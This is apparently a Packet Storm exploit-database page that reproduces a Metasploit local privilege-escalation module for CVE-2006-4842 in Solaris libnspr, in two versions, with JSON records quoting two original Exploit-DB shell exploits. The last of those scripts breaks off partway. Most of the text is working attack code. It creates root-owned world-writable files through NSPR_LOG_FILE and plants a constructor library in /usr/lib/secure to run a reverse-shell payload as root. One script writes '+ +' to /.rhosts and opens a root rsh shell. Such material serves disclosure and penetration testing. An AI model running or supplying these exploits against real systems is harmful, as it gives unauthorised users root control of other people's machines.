Solaris libnspr NSPR_LOG_FILE Privilege Escalation
2018-09-18T00:00:00
ID PACKETSTORM:149416 Type packetstorm Reporter Marco Ivaldi Modified 2018-09-18T00:00:00
Description
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
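class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Solaris::Priv
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Trusted library directory searched by the Solaris runtime linker even for
  # setuid programs, and the library name we plant there. The SUID target (or
  # something it loads) has to resolve this name for the LD_LIBRARY_PATH step
  # in #exploit to take effect -- the default target was tested with it.
  LIB_PATH = '/usr/lib/secure'.freeze
  LIB_NAME = 'libldap.so.5'.freeze

  # Patch IDs from the Sun alert referenced below. Revision 10 or later of the
  # patch matching the platform closes the hole.
  FIXED_PATCHES = [
    119214, # Solaris 10 (x86) patch 119214-10
    119213, # Solaris 10 (SPARC) patch 119213-10
    119212, # Solaris 9 (x86) patch 119212-10
    119211, # Solaris 9 (SPARC) patch 119211-10
    119209  # Solaris 8 (SPARC) patch 119209-10
  ].freeze
  FIXED_PATCH_REVISION = 10

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
      'Description' => %q{
        This module exploits an arbitrary file write vulnerability in the
        Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
        prior to Solaris 10u3 which allows users to gain root privileges.

        libnspr versions prior to 4.6.3 allow users to specify a log file with
        the `NSPR_LOG_FILE` environment variable. The log file is created with
        the privileges of the running process, resulting in privilege escalation
        when used in combination with a SUID executable.

        This module writes a shared object to the trusted library directory
        `/usr/lib/secure` and runs the specified SUID binary with the shared
        object loaded using the `LD_LIBRARY_PATH` environment variable.

        This module has been tested successfully with libnspr version 4.5.1
        on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
      },
      'References' =>
        [
          ['BID', '20471'],
          ['CVE', '2006-4842'],
          ['EDB', '2543'],
          ['EDB', '2569'],
          ['EDB', '2641'],
          ['URL', 'https://securitytracker.com/id/1017050'],
          ['URL', 'https://securitytracker.com/id/1017051'],
          ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
          ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
          ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
        ],
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'iDefense', # Discovery
          'Marco Ivaldi', # Exploit
          'Brendan Coles' # Metasploit
        ],
      'DisclosureDate' => 'Oct 11 2006',
      'Privileged' => true,
      'Platform' => ['solaris'],
      'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
      'Targets' => [['Auto', {}]],
      'SessionTypes' => ['shell', 'meterpreter'],
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
          'WfsDelay' => 10,
          'PrependFork' => true
        },
      'DefaultTarget' => 0))
    register_options [
      # Some useful example SUID executables:
      # * /usr/bin/cancel
      # * /usr/bin/chkey
      # * /usr/bin/lp
      # * /usr/bin/lpset
      # * /usr/bin/lpstat
      # * /usr/lib/lp/bin/netpr
      # * /usr/sbin/lpmove
      OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # Path of the SUID binary to abuse (operator supplied via SUID_PATH).
  def suid_bin_path
    datastore['SUID_PATH']
  end

  # Wrap +path+ in single quotes for the remote Bourne shell so that
  # whitespace or metacharacters in operator-supplied options (SUID_PATH,
  # WritableDir) cannot break out of the command lines built below.
  def shell_quote(path)
    "'#{path.to_s.gsub("'") { "'\\''" }}'"
  end

  # True when the session user can write to +path+ (file or directory).
  def is_writable?(path)
    cmd_exec("[ -w #{shell_quote(path)} ] && echo true").include? 'true'
  end

  # Create +path+ (and parents) on the target and schedule it for removal.
  def mkdir(path)
    vprint_status "Creating directory '#{path}'"
    cmd_exec "mkdir -p #{shell_quote(path)}"
    register_dir_for_cleanup path
  end

  # Write +data+ to +path+ on the target, replacing any existing file, and
  # schedule it for removal.
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Upload C source +data+ as "+path+.c" and compile it into a shared object
  # at +path+ with the target's gcc (also looked up under /usr/sfw and
  # /opt/sfw). Any compiler output is treated as failure, since a warning
  # could just as well mean a broken library.
  def upload_and_compile(path, data)
    upload "#{path}.c", data

    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{shell_quote(path)} #{shell_quote("#{path}.c")}"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
  end

  # Parse a dotted version string into a Gem::Version. Returns nil for an
  # empty or malformed string instead of letting Gem::Version.new raise.
  def parse_version(str)
    s = str.to_s.strip
    return nil if s.empty? || !Gem::Version.correct?(s)
    Gem::Version.new(s)
  end

  # Version of the SUNWpr (libnspr) package as reported by pkginfo, or nil
  # when it cannot be determined.
  def libnspr_package_version
    pkg_info = cmd_exec 'pkginfo -l SUNWpr'
    parse_version pkg_info.to_s.scan(/VERSION:\s+([\d\.]+),/).flatten.first
  end

  # Highest installed revision of patch +patch_id+ according to +showrev_output+
  # ("showrev -p" lists every installed revision, so the first match is not
  # necessarily the newest). Returns nil when the patch is absent.
  def installed_patch_revision(showrev_output, patch_id)
    showrev_output.to_s.scan(/ #{patch_id}-(\d+)/).flatten.map(&:to_i).max
  end

  # Decide whether the target looks exploitable:
  # * the chosen binary must be setuid and gcc must be available,
  # * libnspr must be older than 4.6.3,
  # * the kernel must be SunOS 5.10 or earlier,
  # * none of the fixing Sun patches may be installed at revision 10+.
  def check
    unless setuid? suid_bin_path
      vprint_error "#{suid_bin_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{suid_bin_path} is setuid"

    unless has_gcc?
      vprint_error 'gcc is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gcc is installed'

    # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
    # Earlier versions may also be vulnerable
    libnspr_version = libnspr_package_version
    if libnspr_version.nil?
      vprint_error 'Could not determine libnspr version'
      return CheckCode::Unknown
    end

    if libnspr_version >= Gem::Version.new('4.6.3')
      vprint_error "libnspr version #{libnspr_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "libnspr version #{libnspr_version} appears to be vulnerable"

    # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.
    # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,
    # however third-party software may also introduce a vulnerable version of the library.
    solaris_version = parse_version kernel_release
    if solaris_version.nil?
      vprint_error 'Could not determine Solaris version'
      return CheckCode::Detected
    end

    if solaris_version > Gem::Version.new('5.10')
      vprint_error "Solaris version #{solaris_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Solaris version #{solaris_version} appears to be vulnerable"

    # The vulnerability was patched in various Solaris patches for different platforms.
    # For more information, see:
    # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1
    installed_patches = cmd_exec 'showrev -p'
    FIXED_PATCHES.each do |patch|
      revision = installed_patch_revision(installed_patches, patch)
      next if revision.nil? || revision < FIXED_PATCH_REVISION
      vprint_error "Solaris patch #{patch}-#{revision} has been applied"
      return CheckCode::Safe
    end
    vprint_good 'Solaris patches are not installed'

    CheckCode::Appears
  end

  # Use the NSPR_LOG_FILE bug to make the SUID binary create +path+ as root.
  # The file is created under umask 0, i.e. mode 0666, so the unprivileged
  # session can overwrite its contents afterwards.
  #
  # Operational caveat: until it is removed, a 0666 file sits in a trusted
  # library directory and any local user, not only this session, can write to
  # it. FileDropper deletes it from the new (root) session on success; if no
  # session comes back the file must be removed by hand.
  def create_root_owned_writable_file(path)
    vprint_status "Creating file #{path}"
    log_file = shell_quote(path)
    suid_bin = shell_quote(suid_bin_path)

    cmd_exec 'umask 0'
    # Run once with log modules enabled and once without, as the original
    # module does; which invocation causes libnspr to open the log file
    # appears to depend on the library build -- keep both.
    cmd_exec "NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=#{log_file} #{suid_bin}"
    cmd_exec "NSPR_LOG_FILE=#{log_file} #{suid_bin}"
    cmd_exec 'umask 022'

    unless is_writable? path
      fail_with Failure::Unknown, "Could not create file '#{path}'"
    end

    print_good "Created file #{path}"
    register_file_for_cleanup path
  end

  # C source for the planted library: a global constructor that runs as soon
  # as the runtime linker maps the library into the SUID process, drops to
  # uid/gid 0 and replaces the process with the payload at +payload_path+.
  def constructor_source(payload_path)
    <<-EOF
#include <unistd.h>
#include <stdlib.h>

void __attribute__((constructor)) cons() {
  setuid(0);
  setgid(0);
  /* argv[0] is empty, no environment; sentinels must be pointers on LP64 */
  execle("#{payload_path}", "", (char *)0, (char *)0);
  _exit(0);
}
    EOF
  end

  # Exploit flow:
  # 1. have the SUID binary create a root-owned, world-writable file in the
  #    trusted library directory via NSPR_LOG_FILE;
  # 2. compile a constructor-only shared object and copy it over that file;
  # 3. upload the payload and run the SUID binary with LD_LIBRARY_PATH set to
  #    the trusted directory so our library is picked up and executes the
  #    payload as root.
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    unless is_writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Create writable file in /usr/lib/secure
    lib_file = "#{LIB_PATH}/#{LIB_NAME}"
    create_root_owned_writable_file lib_file

    # Upload and compile shared object
    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    mkdir base_path

    payload_path = "#{base_path}/.#{rand_text_alphanumeric 5..10}"
    so_path = "#{base_path}/.#{rand_text_alphanumeric 5..10}"
    upload_and_compile so_path, constructor_source(payload_path)

    vprint_status "Writing shared object #{lib_file}"
    # cp keeps the root-owned inode (and its 0666 mode); only the contents change.
    cmd_exec "cp #{shell_quote(so_path)} #{shell_quote(lib_file)}"

    # Upload and execute payload
    upload payload_path, generate_payload_exe
    cmd_exec "chmod +x #{shell_quote(payload_path)}"

    print_status 'Executing payload...'
    # Background the SUID binary so cmd_exec returns; the trailing echo gives
    # the shell something to print.
    cmd_exec "LD_LIBRARY_PATH=#{shell_quote(LIB_PATH)} #{shell_quote(suid_bin_path)} & echo "
  end
end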
`
{"id": "PACKETSTORM:149416", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation", "description": "", "published": "2018-09-18T00:00:00", "modified": "2018-09-18T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/149416/Solaris-libnspr-NSPR_LOG_FILE-Privilege-Escalation.html", "reporter": "Marco Ivaldi", "references": [], "cvelist": ["CVE-2006-4842"], "lastseen": "2018-09-18T10:03:46", "viewCount": 25, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-09-18T10:03:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4842"]}, {"type": "exploitdb", "idList": ["EDB-ID:28788", "EDB-ID:28789", "EDB-ID:2569", "EDB-ID:2641", "EDB-ID:45433", "EDB-ID:2543"]}, {"type": "seebug", "idList": ["SSV:64170", "SSV:5260", "SSV:64104", "SSV:3899", "SSV:82335", "SSV:82336", "SSV:16657", "SSV:64124", "SSV:5298"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2A9D47E1F6624AC9BF9BB6A1948A6B9A", "EXPLOITPACK:ABFA17484219E850FDCB9E3C93B96A12", "EXPLOITPACK:0A06BEDE6DDAF9E385796FE859D61F71", "EXPLOITPACK:BF4CC01D6A1DE78B9EEA2F44B218D100", "EXPLOITPACK:17D069ABD6EE3DA02F1E1EC965F0B525"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/LOCAL/LIBNSPR_NSPR_LOG_FILE_PRIV_ESC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14651"]}, {"type": "osvdb", "idList": ["OSVDB:29610"]}, {"type": "zdt", "idList": ["1337DAY-ID-31125"]}, {"type": "canvas", "idList": ["CVE_2006_4842"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_119214-30.NASL", "SOLARIS10_X86_119214-36.NASL", "SOLARIS10_X86_119214.NASL", "SOLARIS10_X86_119214-33.NASL", "SOLARIS10_119213-30.NASL", "SOLARIS10_119213-31.NASL", "SOLARIS10_X86_119214-31.NASL", "SOLARIS10_X86_119214-32.NASL", "SOLARIS10_119213.NASL", "SOLARIS10_119213-36.NASL"]}], "modified": "2018-09-18T10:03:46", "rev": 2}, "vulnersScore": 
6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/149416/libnspr_nspr_log_file_priv_esc.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Solaris::Priv \ninclude Msf::Post::Solaris::System \ninclude Msf::Post::Solaris::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation', \n'Description' => %q{ \nThis module exploits an arbitrary file write vulnerability in the \nNetscape Portable Runtime library (libnspr) on unpatched Solaris systems \nprior to Solaris 10u3 which allows users to gain root privileges. \n \nlibnspr versions prior to 4.6.3 allow users to specify a log file with \nthe `NSPR_LOG_FILE` environment variable. The log file is created with \nthe privileges of the running process, resulting in privilege escalation \nwhen used in combination with a SUID executable. \n \nThis module writes a shared object to the trusted library directory \n`/usr/lib/secure` and runs the specified SUID binary with the shared \nobject loaded using the `LD_LIBRARY_PATH` environment variable. \n \nThis module has been tested successfully with libnspr version 4.5.1 \non Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86). 
\n}, \n'References' => \n[ \n['BID', '20471'], \n['CVE', '2006-4842'], \n['EDB', '2543'], \n['EDB', '2569'], \n['EDB', '2641'], \n['URL', 'https://securitytracker.com/id/1017050'], \n['URL', 'https://securitytracker.com/id/1017051'], \n['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'], \n['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'], \n['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1'] \n], \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'iDefense', # Discovery \n'Marco Ivaldi', # Exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Oct 11 2006', \n'Privileged' => true, \n'Platform' => ['solaris'], \n'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC], \n'Targets' => [['Auto', {}]], \n'SessionTypes' => ['shell', 'meterpreter'], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'solaris/x86/shell_reverse_tcp', \n'WfsDelay' => 10, \n'PrependFork' => true \n}, \n'DefaultTarget' => 0)) \nregister_options [ \n# Some useful example SUID executables: \n# * /usr/bin/cancel \n# * /usr/bin/chkey \n# * /usr/bin/lp \n# * /usr/bin/lpset \n# * /usr/bin/lpstat \n# * /usr/lib/lp/bin/netpr \n# * /usr/sbin/lpmove \nOptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel']) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef suid_bin_path \ndatastore['SUID_PATH'] \nend \n \ndef is_writable?(path) \ncmd_exec(\"[ -w #{path} ] && echo true\").include? 
'true' \nend \n \ndef mkdir(path) \nvprint_status \"Creating directory '#{path}'\" \ncmd_exec \"mkdir -p '#{path}'\" \nregister_dir_for_cleanup path \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \n \noutput = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\" \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \nregister_file_for_cleanup path \nend \n \ndef check \nunless setuid? suid_bin_path \nvprint_error \"#{suid_bin_path} is not setuid\" \nreturn CheckCode::Safe \nend \nvprint_good \"#{suid_bin_path} is setuid\" \n \nunless has_gcc? \nvprint_error 'gcc is not installed' \nreturn CheckCode::Safe \nend \nvprint_good 'gcc is installed' \n \n# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable \n# Earlier versions may also be vulnerable \nlibnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr' \nlibnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first \nif libnspr_pkg_version.to_s.eql? '' \nvprint_error 'Could not determine libnspr version' \nreturn CheckCode::Unknown \nend \n \nif Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3') \nvprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\" \n \n# Solaris 10 versions prior to the 2006 patches are known to be vulnerable. \n# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default, \n# however third-party software may also introduce a vulnerable version of the library. \nversion = kernel_release \nif version.to_s.eql? 
'' \nvprint_error 'Could not determine Solaris version' \nreturn CheckCode::Detected \nend \n \nunless Gem::Version.new(version) <= Gem::Version.new('5.10') \nvprint_error \"Solaris version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Solaris version #{version} appears to be vulnerable\" \n \n# The vulnerability was patched in various Solaris patches for different platforms. \n# For more information, see: \n# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1 \ninstalled_patches = cmd_exec 'showrev -p' \n[ \n119214, # Solaris 10 (x86) patch 119214-10 \n119213, # Solaris 10 (SPARC) patch 119213-10 \n119212, # Solaris 9 (x86) patch 119212-10 \n119211, # Solaris 9 (SPARC) patch 119211-10 \n119209 # Solaris 8 (SPARC) patch 119209-10 \n].each do |patch| \nif installed_patches =~ / #{patch}-(\\d+)/ \nrevision = $1.to_i \nif revision >= 10 \nvprint_error \"Solaris patch #{patch}-#{revision} has been applied\" \nreturn CheckCode::Safe \nend \nend \nend \nvprint_good 'Solaris patches are not installed' \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless [CheckCode::Detected, CheckCode::Appears].include? check \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nunless is_writable? 
datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \n# Create writable file in /usr/lib/secure \nlib_path = '/usr/lib/secure' \nlib_name = 'libldap.so.5' \n \nvprint_status \"Creating file #{lib_path}/#{lib_name}\" \ncmd_exec 'umask 0' \ncmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\" \ncmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\" \ncmd_exec 'umask 022' \n \nunless is_writable? \"#{lib_path}/#{lib_name}\" \nfail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\" \nend \n \nprint_good \"Created file #{lib_path}/#{lib_name}\" \nregister_file_for_cleanup \"#{lib_path}/#{lib_name}\" \n \n# Upload and compile shared object \nbase_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\" \nmkdir base_path \n \npayload_name = \".#{rand_text_alphanumeric 5..10}\" \npayload_path = \"#{base_path}/#{payload_name}\" \n \nso = <<-EOF \nvoid __attribute__((constructor)) cons() { \nsetuid(0); \nsetgid(0); \nexecle(\"#{payload_path}\", \"\", 0, 0); \n_exit(0); \n} \nEOF \n \nso_name = \".#{rand_text_alphanumeric 5..10}\" \nso_path = \"#{base_path}/#{so_name}\" \nupload_and_compile so_path, so \n \nvprint_status \"Writing shared object #{lib_path}/#{lib_name}\" \ncmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\" \nregister_file_for_cleanup \"#{lib_path}/#{lib_name}\" \n \n# Upload and execute payload \nupload payload_path, generate_payload_exe \ncmd_exec \"chmod +x #{payload_path}\" \n \nprint_status 'Executing payload...' \ncmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \" \nend \nend \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "The Netscape Portable Runtime (NSPR) API 4.6.1 and 4.6.2, as used in Sun Solaris 10, trusts user-specified environment variables for specifying log files even when running from setuid programs, which allows local users to create or overwrite arbitrary files.", "edition": 4, "cvss3": {}, "published": "2006-10-12T00:07:00", "title": "CVE-2006-4842", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4842"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/o:sun:solaris:10.0", "cpe:/a:netscape:portable_runtime_api:4.6.1", "cpe:/a:netscape:portable_runtime_api:4.6.2"], "id": "CVE-2006-4842", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4842", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*", "cpe:2.3:a:netscape:portable_runtime_api:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:netscape:portable_runtime_api:4.6.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:30:50", "description": "Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit. CVE-2006-4842. 
Local exploit for solaris platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - Arbitrary File Creation Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:2543", "href": "https://www.exploit-db.com/exploits/2543/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho \"+ 
+\" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n# milw0rm.com [2006-10-13]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2543/"}, {"lastseen": "2016-01-31T16:43:23", "description": "Solaris 10 libnspr constructor Local Root Exploit. CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-24T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - constructor Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EDB-ID:2641", "href": "https://www.exploit-db.com/exploits/2641/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. 
To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\r\necho \" setuid(0);\" >> /tmp/ctors.c\r\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\r\necho \"}\" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? 
